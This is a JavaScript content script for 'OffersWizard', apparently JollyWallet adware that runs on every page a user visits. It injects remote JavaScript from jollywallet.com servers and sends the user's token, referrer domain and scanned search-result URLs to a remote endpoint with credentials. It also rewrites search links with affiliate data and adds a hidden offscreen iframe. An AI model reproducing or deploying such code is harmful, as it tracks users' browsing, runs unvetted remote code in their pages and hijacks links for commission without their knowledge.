var jw_app_name = 'OffersWizard'; 
var jw_ignore=(typeof Storage === 'undefined');
var jw_utils = {};
jw_utils.inArray = Array.prototype.indexOf ? function (arr, val) {if(typeof arr == 'undefined' ) return -1; return arr.indexOf(val) != -1;}:
function (arr, val) {var i = arr.length;while (i--) {if (arr[i] === val) return true;}	return false;};
jw_utils.getToken = function() {return 'D2933E9A-AD6F-F4D4-5680-8DC52B4BDE60'; }; 
var jw_md5 = {};
jw_md5.extract_sub = function (url) {if(url=='') return null; if( url.indexOf('chrome-devtools://') === 0 )return null;var protocols = ['http://', 'https://', 'ftp://'];var a = this.removeStart(url,protocols);var prefix = ['www.', 'www2.','www22.','www1.','wwws.','www311.'];a = this.removeStart(a,prefix);
var b = a.split('?');var c = b[0].split('/');var d = c[0];
return d;};
jw_md5.removeStart = function (url, l){a = url;for (i = 0; i < l.length; i++) {p = l[i]; if (url.indexOf(p) === 0) {a = url.slice(p.length);break;}} return a;};
jw_md5.endsWith = function (str, suffix) {return str.indexOf(suffix, str.length - suffix.length) !== -1;};
jw_md5.BuildKeys = function (url) {if( url.indexOf('chrome-devtools://') === 0 )return null;var protocols = ['http://', 'https://', 'ftp://'];var a = this.removeStart(url,protocols);var prefix = ['www.', 'www2.','www22.','www1.','wwws.','www311.'];a = this.removeStart(a,prefix);
var b = a.split('?');var c = b[0].split('/');var d = c[0];var e = d.split('.');var e_len = e.length;
var domain_terminator = ['com','de','net','it','fr','ch','es','se','br','co','org','il','uk','nz','dk','cz','za','th','sk','sg','my','ph','hk','mx','ar', 'au','pt','fm', 'nl', 'us', 'ca', 'pl', 'eu', 'at', 'tv', 'info', 'ag', 'to', 'tr', 'biz', 'fi', 'ie', 'asia', 'bg', 'ro', 'mobi', 'be', 'hu', 'ru', 'no','cl', 'me', 'cn', 'in', 'cc', 'me', 'ua', 'nu', 'jp', 'ae', 'is', 'la', 'ma', 'pro','do','st','id', 'vn', 'edu', 'kr', 'xyz', 'vc', 'bz', 'club', 'ac', 'ne', 'or'];
	var i=0;var j=0;
for(i=0;i<domain_terminator.length;i++){
	if( e[e_len-1] == domain_terminator[i] ){
		e.splice(e_len-1,e_len-1);e_len--;
		for(j=0;j<domain_terminator.length;j++){
			if ( e[e_len-1] == domain_terminator[j] ){
				e.splice(e_len-1,e_len-1);
				e_len--;
			}}
	    if(e_len>1)e.splice(0, e_len-1);
	    break;}}
for (i = 0; i < e.length; i++) {e[i] = e[i].replace(/-/g,'_');e[i] = this.calcMD5(e[i]);}return e;};
jw_md5.rhex = function (num) {var hex_chr = '0123456789abcdef'; str = ''; for (var j = 0; j <= 3; j++)str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) + hex_chr.charAt((num >> (j * 8)) & 0x0F); return str;};
jw_md5.str2blks_MD5 = function (str) {
	var nblk = ((str.length + 8) >> 6) + 1;
	var blks = new Array(nblk * 16);
	var i=0;
	for (i = 0; i < nblk * 16; i++) blks[i] = 0;
	for (i = 0; i < str.length; i++) blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
	blks[i >> 2] |= 0x80 << ((i % 4) * 8);
	blks[nblk * 16 - 2] = str.length * 8;
	return blks;
};
jw_md5.add = function (x, y) {var lsw = (x & 0xFFFF) + (y & 0xFFFF);var msw = (x >> 16) + (y >> 16) + (lsw >> 16);	return (msw << 16) | (lsw & 0xFFFF);};
jw_md5.rol =function(num,cnt) { return (num << cnt) | (num >>> (32 - cnt));};
jw_md5.cmn =function(q,a,b,x,s,t)   { return this.add(this.rol(this.add(this.add(a, q), this.add(x, t)), s), b);};
jw_md5.ff = function(a,b,c,d,x,s,t) { return this.cmn((b & c) | ((~b) & d), a, b, x, s, t);};
jw_md5.gg = function(a,b,c,d,x,s,t) { return this.cmn((b & d) | (c & (~d)), a, b, x, s, t);};
jw_md5.hh = function(a,b,c,d,x,s,t) { return this.cmn(b ^ c ^ d, a, b, x, s, t);};
jw_md5.ii = function(a,b,c,d,x,s,t) { return this.cmn(c ^ (b | (~d)), a, b, x, s, t);};
jw_md5.calcMD5 = function(str) {
	var x = this.str2blks_MD5(str);
	var a = 1732584193; var b = -271733879; var c = -1732584194; var d = 271733878;
	for (var i = 0; i < x.length; i += 16) {
 var olda = a; var oldb = b; var oldc = c; var oldd = d;
 a=this.ff(a,b,c,d,x[i+0],7,-680876936); d = this.ff(d,a,b,c,x[i + 1], 12, -389564586);	c = this.ff(c, d, a, b, x[i + 2], 17, 606105819);		b = this.ff(b, c, d, a, x[i + 3], 22, -1044525330);
 a=this.ff(a,b,c,d,x[i+4],7,-176418897); d = this.ff(d,a,b,c,x[i + 5], 12, 1200080426);	c = this.ff(c, d, a, b, x[i + 6], 17, -1473231341);	b = this.ff(b, c, d, a, x[i + 7], 22, -45705983);
 a=this.ff(a,b,c,d,x[i+8],7,1770035416); d = this.ff(d,a,b,c,x[i + 9], 12, -1958414417);	c = this.ff(c, d, a, b, x[i + 10], 17, -42063);		b = this.ff(b, c, d, a, x[i + 11], 22, -1990404162);
 a=this.ff(a,b,c,d,x[i+12],7,1804603682);d = this.ff(d,a,b,c,x[i + 13], 12, -40341101);	c = this.ff(c, d, a, b, x[i + 14], 17, -1502002290);	b = this.ff(b, c, d, a, x[i + 15], 22, 1236535329);
 a=this.gg(a,b,c,d,x[i+1],5,-165796510); d = this.gg(d,a,b,c,x[i + 6], 9, -1069501632);	c = this.gg(c, d, a, b, x[i + 11], 14, 643717713);	b = this.gg(b, c, d, a, x[i + 0], 20, -373897302);
 a=this.gg(a,b,c,d,x[i+5],5,-701558691); d = this.gg(d,a,b,c,x[i + 10], 9, 38016083);		c = this.gg(c, d, a, b, x[i + 15], 14, -660478335);	b = this.gg(b, c, d, a, x[i + 4], 20, -405537848);
 a=this.gg(a,b,c,d,x[i+9],5,568446438);	 d = this.gg(d,a,b,c,x[i + 14], 9, -1019803690);	c = this.gg(c, d, a, b, x[i + 3], 14, -187363961);	b = this.gg(b, c, d, a, x[i + 8], 20, 1163531501);
 a=this.gg(a,b,c,d,x[i+13],5,-1444681467);d = this.gg(d,a,b,c,x[i + 2], 9, -51403784);		c = this.gg(c, d, a, b, x[i + 7], 14, 1735328473);	b = this.gg(b, c, d, a, x[i + 12], 20, -1926607734);
 a=this.hh(a,b,c,d,x[i+5],4,-378558);d=this.hh(d,a,b,c,x[i + 8], 11, -2022574463);	c = this.hh(c, d, a, b, x[i + 11], 16, 1839030562);	b = this.hh(b, c, d, a, x[i + 14], 23, -35309556);
 a=this.hh(a,b,c,d,x[i+1],4,-1530992060);d = this.hh(d,a,b,c,x[i + 4], 11, 1272893353);	c = this.hh(c, d, a, b, x[i + 7], 16, -155497632);	b = this.hh(b, c, d, a, x[i + 10], 23, -1094730640);
 a=this.hh(a,b,c,d,x[i+13],4,681279174); d = this.hh(d,a,b,c,x[i + 0], 11, -358537222);	c = this.hh(c, d, a, b, x[i + 3], 16, -722521979);	b = this.hh(b, c, d, a, x[i + 6], 23, 76029189);
 a=this.hh(a,b,c,d,x[i+9],4,-640364487); d = this.hh(d,a,b,c,x[i + 12], 11, -421815835);	c = this.hh(c, d, a, b, x[i + 15], 16, 530742520);	b = this.hh(b, c, d, a, x[i + 2], 23, -995338651);
 a=this.ii(a,b,c,d,x[i+0],6,-198630844); d = this.ii(d,a,b,c,x[i + 7], 10, 1126891415);	c = this.ii(c, d, a, b, x[i + 14], 15, -1416354905);	b = this.ii(b, c, d, a, x[i + 5], 21, -57434055);
 a=this.ii(a,b,c,d,x[i+12],6,1700485571);d = this.ii(d,a,b,c,x[i + 3], 10, -1894986606);	c = this.ii(c, d, a, b, x[i + 10], 15, -1051523);		b = this.ii(b, c, d, a, x[i + 1], 21, -2054922799);
 a=this.ii(a,b,c,d,x[i+8],6,1873313359); d = this.ii(d,a,b,c,x[i + 15], 10, -30611744);	c = this.ii(c, d, a, b, x[i + 6], 15, -1560198380);	b = this.ii(b, c, d, a, x[i + 13], 21, 1309151649);
 a=this.ii(a,b,c,d,x[i+4],6,-145523070); d = this.ii(d,a,b,c,x[i + 11], 10, -1120210379);	c = this.ii(c, d, a, b, x[i + 2], 15, 718787259);		b = this.ii(b, c, d, a, x[i + 9], 21, -343485551);
 a=this.add(a,olda);b = this.add(b, oldb);c = this.add(c, oldc);d = this.add(d, oldd);
	}
	return this.rhex(a) + this.rhex(b) + this.rhex(c) + this.rhex(d);
};
var tbView={};
tbView.tname='bar';
tbView.tver='1';
tbView.static_path='//static.jollywallet.com';
tbView.bl=['.facebook.com','.google.','mail.yahoo','ads.yahoo','www.yahoo','toolbar.yahoo','in.yahoo','hk.yahoo','answers.yahoo','tw.yahoo','news.yahoo','br.yahoo','mx.yahoo','.amazon.com','.doubleclick.net','.atdmt.com','.uol.com.br','bing.com','192.168.','.microsoft.com'];
tbView.unti_bl=['advertise.bingads.microsoft.com', 'bing.com/explore/rewards'];
tbView.isInBlackListLocal = function(url) {
	var d1='';var i=0;var j=0;
	for(i=0;i<this.bl.length;i++)
	{
		d1=this.bl[i];
		if((d1!='search.yahoo')&&(url.indexOf(d1) >= 0)){
			var in_ubl=false;
			for(j=0;j<this.unti_bl.length;j++){
				d1=this.unti_bl[j];
				if((url.indexOf(d1)>= 0)) {in_ubl=true;break;}
			}
			if(in_ubl==false) return true;
		}
	}
	return false;
};
tbView.isInBlackListStorage = function() {
 if(typeof(Storage) === 'undefined') return false;
 var ex = null;
 var bl_j = sessionStorage.getItem('jw_bl');
 if(null!==bl_j) return true; 
 bl_j = localStorage.getItem('jw_bl');
 if(null!==bl_j){
 var bl = JSON.parse(bl_j);
 var ex = bl.expiration;
	var n =  new Date();
	if (Date.parse(n) > Date.parse(ex)) {
		localStorage.removeItem('jw_bl');
		return false;
 	} else {
		return true;
	}
 }
 return false;
};
tbView.isInBlackList = function(url) {
		if (this.isInBlackListLocal(url)) {
			this.add_pc();
			return true;
		} else if (this.isInBlackListStorage(url)) {
			if(tbView.get_amp_mode) tbView.get_amp_mode();
			return true;
		} 
		return false;
	};
tbView.isInsCache = function (url) {if(typeof tbView.sCachDb=='undefined' || tbView.sCachDb == null)return false;
	var keys = jw_md5.BuildKeys(url);
	if(keys!==null){
		var key='';
		for (var i = 0; i < keys.length; i++) {
			key = keys[i];
			for(var j=0;j<tbView.sCachDb.length;j++) { 
				if(jw_utils.inArray(tbView.sCachDb[j].key, key)) return tbView.sCachDb[j].id;
			}
		}
	}
	return 0;
};
tbView.loadjscssfile = function (id,filename,filetype,success){
		if( document.getElementById(id)){if(success) success();return;}
		if (filetype=='js'){
			var fileref=document.createElement('script');
			fileref.setAttribute('type','text/javascript');
			fileref.setAttribute('src',filename);
			var done=false;
			if(success)fileref.onload = fileref.onreadystatechange = function(){
				if (!done && (!this.readyState || this.readyState == 'loaded' || this.readyState == 'complete')) {
					done = true;
					success();
					fileref.onload = fileref.onreadystatechange = null;
				}
			};
		}else if (filetype=='css'){
			var fileref=document.createElement('link');
			fileref.setAttribute('rel','stylesheet');
			fileref.setAttribute('type','text/css');
			fileref.setAttribute('href',filename);
		}
		if (typeof fileref!='undefined'){
			fileref.setAttribute('id',id);
			document.getElementsByTagName('head')[0].appendChild(fileref);
		}
	};
tbView.getCookie = function(c_name) {
	var c_value = document.cookie;
	var c_start = c_value.indexOf(' ' + c_name + '=');
	if (c_start == -1) {c_start = c_value.indexOf(c_name + '=');}
	if (c_start == -1) {c_value = null;	} else {
		c_start = c_value.indexOf('=', c_start) + 1;
		var c_end = c_value.indexOf(';', c_start);
		if (c_end == -1) {c_end = c_value.length;}
		c_value = unescape(c_value.substring(c_start, c_end));
	}
	return c_value;
};
tbView.addInitFrame=function(dist,sub,ver) { if(tbView.isInBlackList(document.URL) ) return false; return true;};
tbView.isAffiliateRef=function(){
	var ref=document.referrer;
	if((ref.indexOf('.google.')>0) && (ref.indexOf('&ai=')>0)) return '1';
	var aff_list = ['flamingoworld.com','anycodes.com','bradsdeals.com','cdcoupons.com','cheaperseeker.com','chippmunk.com',
'couponalert.com','couponcabin.com','couponchief.com','coupondudes.com','couponfollow.com','couponmountain.com',
'couponpaste.com','coupons.com','dealcatcher.com','dealigg.com','deallocker.com','dealspl.us','dealsvario.com',
'dropdowndeals.com','goodsearch.com','multimediamuse.org','mycoupons.com','offers.com','shareasale.com',
'piggycoupons.com','promocodesforyou.com','retailmenot.com','riocoupon.com','savings-center.com','slickdeals.net',
'thecouponscoop.com','tjoos.com','wantacode.com','yourcoupongirl.com','befrugal.com','couponscave.com','toastybear.com',
'scitechdaily.com','8couponcode.com','couponmom.com','couponwinner.com','dealally.com','deals2buy.com','deals365.us',
'finddiscountcodes.com','megastoredeals.com','promotioncode.org','shopfest.com','sumocoupon.com','techbargains.com','extrabux.com','ebates.com','mikes-top-picks.com'];
	for (var i in aff_list) {aff=aff_list[i];if(ref.indexOf(aff)>1) return '2';}
	return '0';
};
tbView.jw_loaded = false;
var jw_jquery = null;
tbView.rethink_tver = function(tver){return tver;}
tbView.is_mobile_template = function(){
	return (tbView.tname=='amp' || (tbView.tname+'_'+tbView.tver)=='bar_8');
};
tbView.prepare = function(protocol,tname,tver){
tbView.tname=tname;
	tbView.tver=tver;
	var host=protocol+'static.jollywallet.com';
	tbView.loadjscssfile('jw_0','//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js','js',
		function(){
			if(typeof jw_jquery != 'function'){
				if(typeof $ != 'undefined' && $ != null)
					jw_jquery=$.noConflict(true);
				else if(typeof jQuery != 'undefined' && jQuery != null)
					jw_jquery=jQuery.noConflict(true);
			}
			if (!document.getElementById('jw_6'))
				tbView.loadjscssfile('jw_6',host +'/tlb/v4/jw_fb206/source/jquery.jw_fancybox.js','js',function(){tbView.jw_loaded=true;});
		});
	  tbView.loadjscssfile('jw_1_2',host+'/tlb/platform/js/jw_interface_2.js','js');
	  if(tver=='100') return;
	  if(tver){} else tver='0';
	  if(tver=='0') {
			tbView.loadjscssfile('jw_3',host+'/tlb/v3/jw_bar.css','css');
			tbView.loadjscssfile('jw_4',host+'/tlb/v3/jw_bar.js','js');
	  }  else { 
			tbView.loadjscssfile(tname+'_3',host+'/tlb/v4/templates/jw_'+tname+'_'+tver+'.js','js');
			tbView.loadjscssfile(tname+'_4',host+'/tlb/v4/jw_'+tname+'.js','js');
			if (tbView.is_mobile_template()) {
				tbView.loadjscssfile('jw_mobile_file',host+'/tlb/v4/jw_mobile.js','js');
	  	}
	  }
	tbView.loadjscssfile('jw_5',host+'/tlb/v4/jw_fb206/source/jquery.jw_fancybox.css','css');
	};
tbView.open_myaccount = function(){
		if (typeof jw_jquery != 'undefined' && jw_jquery != null) {
			if(	document.getElementById('jw_5') && document.getElementById('bar_4') && document.getElementById('bar_3') && 
				document.getElementById('jw_1_2') && document.getElementById('jw_0') && tbView.jw_loaded===true){
				if(typeof jwBarInterface != 'undefined'){ 
					jwBarInterface.token='D2933E9A-AD6F-F4D4-5680-8DC52B4BDE60';
					jwBarInterface.aff_id=''; 
					jwBarInterface.jw_open_popup('myaccount'); 
					return;
				} 
			}
		}
		setTimeout(function(){tbView.open_myaccount();},20);
	};
tbView.myaccount = function(ref){
		var protocol = 'http://';
		if( document && document.location) 
			if('https:' == document.location.protocol) 
				protocol='https://'; 
		tbView.prepare(protocol, 'bar','1'); 
		setTimeout(function(){tbView.open_myaccount();},20);
	};
tbView.verify_load = function(success, tname, only_jquery){
 if (typeof jw_jquery != 'undefined' && jw_jquery != null) {
		if((typeof only_jquery != 'undefined') && (only_jquery===true)){success(); return;}
		var is_mobile_template = tbView.is_mobile_template();
		if(document.getElementById('jw_5') 
				&& document.getElementById(tname+'_3') 
				&& document.getElementById(tname+'_4') 
				&& ((is_mobile_template && document.getElementById('jw_mobile_file')) || (!is_mobile_template)) 
				&& document.getElementById('jw_1_2') 
				&& document.getElementById('jw_0')) {
			if(typeof jwBarInterface != 'undefined'){ success(); return;}
		}}
	setTimeout(function(){tbView.verify_load(success, tname, only_jquery);},20);
};
tbView.start_search = function(index){
		if(jw_jquery(document).find('#jw_box_1').length>0) return;        
		_jw_search.init();
		_jw_search.tid='';
		_jw_search.dist='101';
		_jw_search.dist_sub='14698';
		var _timeout=1;
		var icon = new Image(); 
		icon.src = '//www.jollywallet.com/resources/images/jw/logo_22X22u.png';
		
		window.setTimeout(function(){
			_jw_search.dom_scanner(index);
			if(_jw_search.urls && _jw_search.urls.length>0) 
			{
				jw_jquery(document).on('onkeydown', '#jw_input_email, #jw_input_pass', 
					function(e){e.stopPropagation();}
				);
				
				//load css if its not in page already.
				var jw_css_url = '//api.jollywallet.com/search/jw_search.css';
				if (jw_jquery("link[href='"+jw_css_url+"']").length<1)
					tbView.loadjscssfile('jw_search_css', jw_css_url, 'css', null);
					
				jw_jquery(document).on('input', '#jw_input_email',
					function(e) {
						var txt = jw_jquery.trim(jw_jquery(this).val());
						if (txt.length < 3)
							jw_jquery('#jw_continue_button').addClass('jw_disabled_btn');
						else
							jw_jquery('#jw_continue_button').removeClass('jw_disabled_btn');
				});
			
				var u='//api.jollywallet.com/affiliate/search?dist='+_jw_search.dist+'&sub='+_jw_search.dist_sub+'&p=0&token=D2933E9A-AD6F-F4D4-5680-8DC52B4BDE60&ver=0&ref='+index+'&r='+Math.random()+'&ulist='+encodeURIComponent(JSON.stringify(_jw_search.urls));
			 	jw_jquery.ajax({
					url: u,
					type: 'GET',
					crossDomain: true,
					dataType: 'json',
					xhrFields: {withCredentials: true},
					success:function(data){
						try{
							var t0=1;	// standard link display, 
							var t1=0;	// upper bar
							var t2=0;	// unified link.
							var t3=0;	// relocate.
							var t4=0;	// relocate random
							if(data.display){
								if(data.display.t0) t0=data.display.t0;
								if(data.display.t1) t1=data.display.t1;
								if(data.display.t2) t2=data.display.t2;
								if(data.display.t3) t3=data.display.t3;
								if(data.display.t4) t4=data.display.t4;
							}
							if(t0==1){
								for(n in _jw_search.urls_pos){
									u=_jw_search.urls_pos[n];
									_jw_search.update_node(n, data[u], t2);
								}
							}
							if (jw_jquery('#jw_omni_iframe').length<1)
								jw_jquery('body').append('<div style="height:1px;width:1px;position:absolute;top:10000px;left:0px;"><iframe id="jw_omni_iframe" src="" style="visibility:hidden;" width="0px" height="0px" /></div>');
							if(t1==1 && _jw_search.t1) _jw_search.t1(data,index);
							if(t3==1 && _jw_search.t3) _jw_search.t3(new Array(t1,t2,t3,t4));
							if(t4==1 && _jw_search.t4) _jw_search.t4(new Array(t1,t2,t3,t4));
						}catch(ex){}
					},
				});
			}
		},_timeout);
	}
tbView.set_ga = function(_p, _e) {
if(typeof(Storage) !== 'undefined') { 
  var a = sessionStorage.getItem('jw_e_'+_e);
  if(null==a) sessionStorage.setItem('jw_e_'+_e,1);
  else {return;}
}else {}
try {
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create','UA-38503582-1','auto',{'name':'jw_ga'});
ga('jw_ga.set','page','');
if(_p==1) ga('jw_ga.send','pageview');
ga('jw_ga.send','event','jw',_e);
} catch(e){}
};
tbView.add_pc = function(){
};
tbView.disableBar = function(expirationDate, reason) {
	var created = new Date();
	var storageStr = '{"created" : "'+created+'" , "expiration" : "'+expirationDate+'" , "reason" : "'+reason+'"}';
	if(typeof(Storage)!=='undefined'){localStorage.setItem('jw_bl', storageStr);}
};
tbView.disableBarSession = function(reason) {
	var created = new Date();
	var storageStr = '{"created" : "'+created+'" , "reason" : "'+reason+'"}';
	if(typeof(Storage)!=='undefined'){sessionStorage.setItem('jw_bl', storageStr);}
};
tbView.start = function(cnt){
	if(tbView.isInBlackList(document.URL)) return;
	tbView.sCachDb = [];
	var search_index= tbView.isInsCache(document.URL);
	if(search_index>0){
		if(typeof jQuery != 'undefined' && jQuery != null) {
			jw_jquery=jQuery.noConflict(true);
		} else {
			var protocol = 'http://';
			if( document && document.location) if('https:' == document.location.protocol) protocol='https://'; 
			tbView.prepare(protocol,'bar',100);
		}
		tbView.verify_load(function(){tbView.start_search(search_index);}, 'bar', true)
		if(search_index==6) setInterval(_jw_search.g_search, 350);	} 
	else {
			var aff_ref=tbView.isAffiliateRef();
			var r=jw_md5.extract_sub(document.referrer);
			var e='';if(r != null) e='&docref='+r;
			tbView.loadjscssfile('jw_a','//query.jollywallet.com/affiliate/jsquery2?dist=101&sub=14698&ver=1&p=0&token=D2933E9A-AD6F-F4D4-5680-8DC52B4BDE60&aff_ref='+aff_ref+e+'&r='+Math.random(),'js',null);
	} 
};
if(window==window.top && jw_ignore===false) tbView.start();